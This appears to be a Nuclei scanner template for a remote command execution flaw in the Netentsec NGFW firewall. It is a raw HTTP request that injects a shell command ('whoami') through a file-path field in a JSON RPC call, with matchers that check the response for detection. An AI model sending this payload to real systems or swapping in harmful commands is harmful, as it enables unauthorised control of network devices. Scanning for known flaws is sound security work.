id: wangkang-NGFW-rce

info:
  name: 网康 NGFW 防火墙远程命令执行漏洞
  author: Str1am
  severity: critical
  tags: NGFW,rce

requests:
  - raw:
      - |
        POST /directdata/direct/router HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"action":"SSLVPN_Resource","method":"deleteImage","data":[{"data":["/var/www/html/d.txt;whoami"]}],"type":"rpc","tid":17,"f8839p7rqtj":"=","kl26aiyll4f":"="}

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "SSLVPN_Resource"
          - "deleteImage"
        part: body
        condition: and